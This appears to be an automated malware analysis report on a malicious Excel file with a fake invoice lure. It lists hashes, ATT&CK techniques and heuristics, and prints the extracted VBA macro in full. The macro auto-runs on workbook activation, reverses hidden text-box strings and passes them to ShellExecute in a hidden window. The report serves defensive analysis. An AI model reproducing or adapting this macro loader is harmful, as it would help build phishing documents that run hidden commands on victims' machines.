Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6bdf3db2c6c057f5…

MALICIOUS

Office (OLE)

Size: 264.0 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
First seen: 2021-06-28
MD5: 813d297d4059025093843cabe7bc2b5d
SHA-1: b93ec1f412b81c408f565cce6ade8b149f8b3643
SHA-256: 6bdf3db2c6c057f525b5d1dc7265270b0904a5f7a364bf1145851970a7a4309b
Risk Score: 108

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

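The document contains VBA macros that use the `Shell.Application` object to execute commands. The heuristics flag a reference to `ShellExecute`, the presence of VBA macros, and a fake invoice lure. The script's primary function is to execute a command constructed from text boxes within the document: when the workbook is activated, the macro reads two text boxes on the first sheet, reverses each string, and passes the results to `ShellExecute` with the show parameter set to 0 (hidden window). The program name is "P" plus the reversed text of TextBox 2, and the arguments are the reversed text of TextBox 1. The command is likely intended to download and run a second-stage payload.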

Heuristics 4

  • Reference to ShellExecute API (high, SC_STR_SHELLEXEC)
  • VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    Matched line in script:
    Set tqsOfhbtsWwINQQzouSY = CreateObject("Shell.Application")
    tqsOfhbtsWwINQQzouSY.ShellExecute "P" + cozBWQucK(fjkerooos), cozBWQucK(fgfjhfgfg), "", "", 0
  • Fake invoice / payment lure (low, SE_INVOICE_LURE)
    Document contains invoice or payment language paired with an action verb; this is useful context when combined with link, macro, or attachment indicators

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1314 bytes
SHA-256: 5876905b812d9423644ee868c6bf0af0b9b177461037e8431492f38e9e8592bb
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()

Dim fGOzlqhZXccU, mNnDRGQmct, fgfyh, NGFPAxqkmttRDiX

Set mNnDRGQmct = ThisWorkbook.Sheets.Item(1)


With mNnDRGQmct

fGOzlqhZXccU = .TextBoxes("TextBox 1").Text

t7gh0 = .TextBoxes("TextBox 2").Text

End With


fgfyh = yMVumusAfyHAAMsz(fGOzlqhZXccU, t7gh0)
End Sub

Function yMVumusAfyHAAMsz(fgfjhfgfg, fjkerooos)
Dim tqsOfhbtsWwINQQzouSY

Set tqsOfhbtsWwINQQzouSY = CreateObject("Shell.Application")
tqsOfhbtsWwINQQzouSY.ShellExecute "P" + cozBWQucK(fjkerooos), cozBWQucK(fgfjhfgfg), "", "", 0

End Function



Function cozBWQucK(s)
  Dim p
  For p = Len(s) To 1 Step -1
      cozBWQucK = cozBWQucK & Mid(s, p, 1)
  Next
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True